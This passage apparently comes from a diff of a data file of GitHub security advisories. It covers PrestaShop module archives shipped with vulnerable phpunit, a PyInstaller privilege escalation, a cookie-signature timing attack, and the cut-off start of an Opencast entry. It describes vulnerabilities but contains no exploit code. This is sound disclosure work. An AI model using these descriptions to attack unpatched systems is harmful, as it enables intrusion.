'https://lists.apache.org/thread.html/752ec92cd1e334a639e79bfbd689a4ec2c6579ec5bb41b53ffdf358d@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r05755112a8c164abc1004bb44f198b1e3d8ca3d546a8f13ebd3aa05f@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r107c8737db39ec9ec4f4e7147b249e29be79170b9ef4b80528105a2d@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r13d4b5c60ff63f3c4fab51d6ff266655be503b8a1884e2f2fab67c3a@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r189aaeaad897f7d6b96f7c43a8ef2dfb9f6e9f8c1cc9ad182ce9b9ae@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b7734dfdfd938640f2f5fb6f4231a267145c71ed60cc7faa1cbac07@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r26244f9f7d9a8a27a092eb0b2a0ca9395e88fcde8b5edaeca7ce569c@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2756fd570b6709d55a61831ca028405bcb3e312175a60bc5d911c81f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3543ead2317dcd3306f69ee37b07dd383dbba6e2f47ff11eb55879ad@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r356d57d6225f91fdc30f8b0a2bed229d1ece55e16e552878c5fa809a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3bf7b982dfa0779f8a71f843d2aa6b4184a53e6be7f149ee079387fd@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c575cabc7386e646fb12cb82b0b38ae5a6ade8a800f827107824495@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3cf50d05ce8cec8c09392624b7bae750e7643dae60ef2438641ee015@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48d5019bd42e0770f7e5351e420a63a41ff1f16924942442c6aff6a8@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48efc7cb5aeb4e1f67aaa06fb4b5479a5635d12f07d0b93fc2d08809@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ac89cbecd9e298ae9fafb5afda6fa77ac75c78d1ac957837e066c4e@%3Cuser.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r52a5129df402352adc34d052bab9234c8ef63596306506a89fdc7328@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r594411f4bddebaf48a4c70266d0b7849e0d82bb72826f61b3a35bba7@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c084578b3e3b40bd903c9d9e525097421bcd88178e672f612102eb2@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6236b5f8646d48af8b66d5050f288304016840788e508c883356fe0e@%3Clog4j-user.logging.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r696507338dd5f44efc23d98cafe30f217cf3ba78e77ed1324c7a5179@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6aec6b8f70167fa325fb98b3b5c9ce0ffaed026e697b69b85ac24628@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b45a2fcc8e98ac93a179183dbb7f340027bdb8e3ab393418076b153@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d34da5a0ca17ab08179a30c971446c7421af0e96f6d60867eabfc52@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71e26f9c2d5826c6f95ad60f7d052d75e1e70b0d2dd853db6fc26d5f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7a1acc95373105169bd44df710c2f462cad31fb805364d2958a5ee03@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7f462c69d5ded4c0223e014d95a3496690423c5f6f05c09e2f2a407a@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8418a0dff1729f19cf1024937e23a2db4c0f94f2794a423f5c10e8e7@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8890b8f18f1de821595792b58b968a89692a255bc20d86d395270740@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a1cfd4705258c106e488091fcec85f194c82f2bbde6bd151e201870@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8c392ca48bb7e50754e4bc05865e9731b23d568d18a520fe3d8c1f75@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8c6300245c0bcef095e9f07b48157e2c6471df0816db3408fcf1d748@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d78a0fbb56d505461e29868d1026e98c402e6a568c13a6da67896a2@%3Cdev.jena.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e3f7da12bf5750b0a02e69a78a61073a2ac950eed7451ce70a65177@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r909b8e3a36913944d3b7bafe9635d4ca84f8f0e2cd146a1784f667c2@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90c23eb8c82835fa82df85ae5e88c81fd9241e20a22971b0fb8f2c34@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r944183c871594fe9a555b8519a7c945bbcf6714d72461aa6c929028f@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a9e3b42cd5d1c4536a14ef04f75048dec8e2740ac6a138ea912177f@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d0d03f2e7d9e13c68b530f81d02b0fec33133edcf27330d8089fcfb@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d2e28e71f91ba0b6f4114c8ecd96e2b1f7e0d06bdf8eb768c183aa9@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9dc2505651788ac668299774d9e7af4dc616be2f56fdc684d1170882@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9fb3238cfc3222f2392ca6517353aadae18f76866157318ac562e706@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra18a903f785aed9403aea38bc6f36844a056283c00dcfc6936b6318c@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra54fa49be3e773d99ccc9c2a422311cf77e3ecd3b8594ee93043a6b1@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9611a8431cb62369bce8909d7645597e1dd45c24b448836b1e54940@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb3c94619728c8f8c176d8e175e0a1086ca737ecdfcd5a2214bb768bc@%3Ccommits.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc45eb0f53fd6242af3e666c2189464f848a851d408289840cecc6e3@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbd19de368abf0764e4383ec44d527bc9870176f488a494f09a40500d@%3Ccommon-dev.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbdf18e39428b5c80fc35113470198b1fe53b287a76a46b0f8780b5fd@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc17d8491beee51607693019857e41e769795366b85be00aa2f4b3159@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc628307962ae1b8cc2d21b8e4b7dd6d7755b2dd52fa56a151a27e4fd@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd71280585425dad7e232f239c5709e425efdd0d3de4a92f808a4767@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd3a9511eebab60e23f224841390a3f8cd5358cff605c5f7042171e47@%3Cdev.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd6254837403e8cbfc7018baa9be29705f3f06bd007c83708f9a97679@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7805c1bf9388968508c6c8f84588773216e560055ddcc813d19f347@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd882ab6b642fe59cbbe94dc02bd197342058208f482e57b537940a4b@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rda4849c6823dd3e83c7a356eb883180811d5c28359fe46865fd151c3@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdb7ddf28807e27c7801f6e56a0dfb31092d34c61bdd4fa2de9182119@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf2a0d94c3b5b523aeff7741ae71347415276062811b687f30ea6573@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re36da78e4f3955ba6c1c373a2ab85a4deb215ca74b85fcd66142fea1@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reaf6b996f74f12b4557bc221abe88f58270ac583942fa41293c61f94@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec34b1cccf907898e7cb36051ffac3ccf1ea89d0b261a2a3b3fb267f@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1b434e11834a4449cd7addb69ed0aef0923112b5938182b363a968c@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf53eeefb7e7e524deaacb9f8671cbf01b8a253e865fb94e7656722c0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf77f79699c8d7e430c14cf480f12ed1297e6e8cf2ed379a425941e80@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9c19bcc2f7a98a880fa3e3456c003d331812b55836b34ef648063c9@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfdf65fa675c64a64459817344e0e6c44d51ee264beea6e5851fb60dc@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200110-0001/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4495-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4686'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00022.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-12-27T22:02:37Z', 'nvd_published_at': '2019-12-20T17:15:00Z'}"
+1.4.0,GHSA-f884-gm86-cg3q,2020-01-07T17:20:13Z,2020-01-07T17:20:47Z,,[],PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841,"### Impact
+
+We have identified that some ps_facetedsearch module ZIP archives have been built with phpunit dev dependencies. PHPUnit contains a php script that would allow, on a webserver, an attacker to perform a RCE.
+
+This vulnerability impacts
+- phpunit before 4.8.28 and 5.x before 5.6.3 as reported in [CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841)
+- phpunit >= 5.63 before 7.5.19 and 8.5.1 (this is a newly found vulnerability that is currently being submitted as a CVE after disclosure was provided to phpunit maintainers)
+
+### Patches
+
+In the [security patch](https://github.com/PrestaShop/ps_facetedsearch/releases/tag/v3.4.1), we look for the unwanted vendor/phpunit folder and remove it if we find it. This allows users to fix the security issue when upgrading.
+
+### Workarounds
+Users can also simply remove the unwanted vendor/phpunit folder.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2017-9841
+
+### For more information
+If you have any questions or comments about this advisory, email us at security@prestashop.com",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/ps_facetedsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_facetedsearch/security/advisories/GHSA-f884-gm86-cg3q'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_facetedsearch/commit/47c4785a21ee3b1734b2d46f044f9659a151feca'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-01-07T17:20:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7fcj-pq9j-wh2r,2021-01-08T21:19:50Z,2020-01-16T22:18:27Z,,['CVE-2019-16784'],Local Privilege Escalation in PyInstaller,"### Impact
+
+Local Privilege Escalation in all Windows software frozen by PyInstaller in ""onefile"" mode.
+
+The vulnerability is present only on Windows and in this particular case: If a **software frozen by PyInstaller in ""onefile"" mode** is launched by a (privileged) user who has **his/her ""TempPath"" resolving to a world writable directory**. This is the case e.g. if the software is launched as a service or as a scheduled task using a system account (in which case TempPath will default to C:\Windows\Temp).
+
+In order to be exploitable the software has to be (re)started after the attacker has launched the exploit program. So for a service launched at startup, a service restart is needed (e.g. after a crash or an upgrade).
+
+While PyInstaller itself was not vulnerable, all Windows software frozen by PyInstaller in ""onefile"" mode is vulnerable.
+
+CVSSv3 score 7.0 (High)
+CVSSv3 vector CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+
+Affected
+- all Windows software frozen by PyInstaller in ""onefile"" mode
+
+No affected
+- PyInstaller itself (except if frozen by PyInstaller in ""onefile"" mode on Windows)
+- software frozen in ""one*dir*"" mode
+- other platforms (GNU/Linux, OS X, BSD, etc.)
+
+### Patches
+The problem is patched in commits 42a67148b3bdf9211fda8499fdc5b63acdd7e6cc (fixed code) and be948cf0954707671aa499da17b10c86b6fa5e5c (recompiled bootloaders). Users should upgrade to PyInstaller version 3.6 and rebuild their software.
+
+### Workarounds
+There is no known workaround. Users using PyInstaller to freeze their Windows software using ""onefile"" mode should upgrade PyInstaller and rebuild their software.
+
+### Credits
+This vulnerability was discovered and reported by Farid AYOUJIL (@faridtsl), David HA, Florent LE NIGER and Yann GASCUEL (@lnv42) from Alter Solutions (@AlterSolutions) and fixed in collaboration with
+Hartmut Goebel (@htgoebel, maintainer of PyInstaller).
+
+### Funding Development
+
+PyInstaller is in urgent need of funding to make future security fixes happen, see for details.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'PyInstaller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyinstaller/pyinstaller/security/advisories/GHSA-7fcj-pq9j-wh2r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16784'}, {'type': 'WEB', 'url': 'https://github.com/pyinstaller/pyinstaller/commit/42a67148b3bdf9211fda8499fdc5b63acdd7e6cc'}, {'type': 'WEB', 'url': 'https://github.com/pyinstaller/pyinstaller/commit/be948cf0954707671aa499da17b10c86b6fa5e5c'}]","{'cwe_ids': ['CWE-250'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-01-14T20:09:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wqq8-mqj9-697f,2020-01-08T03:06:57Z,2020-01-08T03:10:30Z,,[],PrestaShop autoupgrade module ZIP archives were vulnerable from CVE-2017-9841,"### Impact
+
+We have identified that some autoupgrade module ZIP archives have been built with phpunit dev dependencies. PHPUnit contains a php script that would allow, on a webserver, an attacker to perform a RCE.
+
+This vulnerability impacts
+- phpunit before 4.8.28 and 5.x before 5.6.3 as reported in [CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841)
+- phpunit >= 5.63 before 7.5.19 and 8.5.1 (this is a newly found vulnerability that is currently being submitted as a CVE after disclosure was provided to phpunit maintainers)
+
+You can read PrestaShop official statement about this vulnerability [here](https://build.prestashop.com/news/critical-security-vulnerability-in-prestashop-modules/).
+
+### Patches
+
+In the [security patch](https://github.com/PrestaShop/autoupgrade/releases/tag/v4.10.1), we look for the unwanted vendor/phpunit folder and remove it if we find it. This allows users to fix the security issue when upgrading.
+
+### Workarounds
+Users can also simply remove the unwanted vendor/phpunit folder.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2017-9841
+
+### For more information
+If you have any questions or comments about this advisory, email us at security@prestashop.com",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/autoupgrade'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.10.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/autoupgrade/security/advisories/GHSA-wqq8-mqj9-697f'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/autoupgrade/commit/ce96357ad3ff6278bb28dc225913e75c2f077a32'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-01-08T03:06:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-769f-539v-f5jg,2020-01-08T03:10:06Z,2020-01-08T03:10:44Z,,[],PrestaShop gamification module ZIP archives were vulnerable from CVE-2017-9841,"### Impact
+
+We have identified that some gamification module ZIP archives have been built with phpunit dev dependencies. PHPUnit contains a php script that would allow, on a webserver, an attacker to perform a RCE.
+
+This vulnerability impacts
+- phpunit before 4.8.28 and 5.x before 5.6.3 as reported in [CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841)
+- phpunit >= 5.63 before 7.5.19 and 8.5.1 (this is a newly found vulnerability that is currently being submitted as a CVE after disclosure was provided to phpunit maintainers)
+
+You can read PrestaShop official statement about this vulnerability [here](https://build.prestashop.com/news/critical-security-vulnerability-in-prestashop-modules/).
+
+### Patches
+
+In the [security patch](https://github.com/PrestaShop/gamification/releases/tag/v2.3.2), we look for the unwanted vendor/phpunit folder and remove it if we find it. This allows users to fix the security issue when upgrading.
+
+### Workarounds
+Users can also simply remove the unwanted vendor/phpunit folder.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2017-9841
+
+### For more information
+If you have any questions or comments about this advisory, email us at security@prestashop.com",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/gamification'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/gamification/security/advisories/GHSA-769f-539v-f5jg'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/gamification/commit/5044bda903a7ea9596c21faa2b9a42244763568c'}, {'type': 'WEB', 'url': 'https://build.prestashop.com/news/critical-security-vulnerability-in-prestashop-modules/'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-01-08T03:10:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-92vm-wfm5-mxvv,2022-08-03T21:36:59Z,2020-01-06T18:44:10Z,,['CVE-2016-1000236'],cookie-signature Timing Attack,"Affected versions of `cookie-signature` are vulnerable to timing attacks as a result of using a fail-early comparison instead of a constant-time comparison.
+
+Timing attacks remove the exponential increase in entropy gained from increased secret length, by providing per-character feedback on the correctness of a guess via miniscule timing differences.
+
+Under favorable network conditions, an attacker can exploit this to guess the secret in no more than `charset*length` guesses, instead of `charset^length` guesses required were the timing attack not present.
+
+
+
+## Recommendation
+
+Update to 1.0.4 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'cookie-signature'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000236'}, {'type': 'WEB', 'url': 'https://github.com/tj/node-cookie-signature/commit/2c4df6b6cee540f30876198cd0b5bebf28528c07'}, {'type': 'WEB', 'url': 'https://github.com/tj/node-cookie-signature/commit/39791081692e9e14aa62855369e1c7f80fbfd50e'}, {'type': 'WEB', 'url': 'https://github.com/tj/node-cookie-signature/commit/4cc5e21e7f59a4ea0b51cd5e9634772d48fab590'}, {'type': 'WEB', 'url': 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838618'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1371409'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000236'}, {'type': 'PACKAGE', 'url': 'https://github.com/tj/node-cookie-signature'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2016-1000236'}, {'type': 'WEB', 'url': 'https://travis-ci.com/nodejs/security-wg/builds/76423102'}, {'type': 'WEB', 'url': 'https://www.mail-archive.com/secure-testing-team@lists.alioth.debian.org/msg06583.html'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/134'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-12-27T22:19:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mh8g-hprg-8363,2021-10-20T18:03:56Z,2020-01-30T21:21:44Z,,['CVE-2020-5222'],Hard-Coded Key Used For Remember-me Token in Opencast,"### Impact
+
